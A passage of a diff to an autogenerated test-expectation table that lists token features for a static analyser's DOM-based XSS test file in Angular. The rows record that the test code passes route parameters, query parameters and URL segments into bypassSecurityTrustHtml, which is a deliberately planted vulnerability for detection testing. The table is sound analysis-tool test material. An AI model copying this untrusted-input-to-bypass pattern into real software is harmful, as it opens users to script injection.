... 'foo')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:12:30:20 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:12:30:20 | sanitizer | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:12:30:20 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:12:30:20 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:12:30:20 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:22:30:44 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:22:30:44 | bypassS ... ustHtml | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:22:30:44 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:22:30:44 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:22:30:44 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:48 | map | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:48 | map | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:48 | map | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:48 | map | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:48 | map | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:52 | map.get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:52 | map.get | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:52 | map.get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:52 | map.get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:52 | map.get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | exceptional return of map.get('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | exceptional return of map.get('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | exceptional return of map.get('foo') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | exceptional return of map.get('foo') | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | exceptional return of map.get('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | map.get('foo') | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | map.get('foo') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | map.get('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12012,6 +91310,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | map.get('foo') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | map.get('foo') | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:46:30:59 | map.get('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:50:30:52 | get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:50:30:52 | get | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:50:30:52 | get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:50:30:52 | get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:50:30:52 | get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:54:30:58 | 'foo' | CalleeFlexibleAccessPath | map.get | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:54:30:58 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:54:30:58 | 'foo' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12020,6 +91323,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:54:30:58 | 'foo' | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:54:30:58 | 'foo' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:30:54:30:58 | 'foo' | receiverName | map | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | exceptional return of this.sa ... ].path) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | exceptional return of this.sa ... ].path) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | exceptional return of this.sa ... ].path) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | exceptional return of this.sa ... ].path) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | exceptional return of this.sa ... ].path) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | this.sa ... ].path) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | this.sa ... ].path) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | this.sa ... ].path) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | this.sa ... ].path) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:5:33:75 | this.sa ... ].path) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:10:33:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:10:33:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:10:33:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:10:33:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:10:33:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:20:33:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:20:33:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:20:33:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:20:33:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:20:33:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:66 | this.ro ... hot.url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:66 | this.ro ... hot.url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:66 | this.ro ... hot.url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:66 | this.ro ... hot.url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:66 | this.ro ... hot.url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:69 | this.ro ... .url[1] | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:69 | this.ro ... .url[1] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:69 | this.ro ... .url[1] | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:69 | this.ro ... .url[1] | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:69 | this.ro ... .url[1] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:74 | 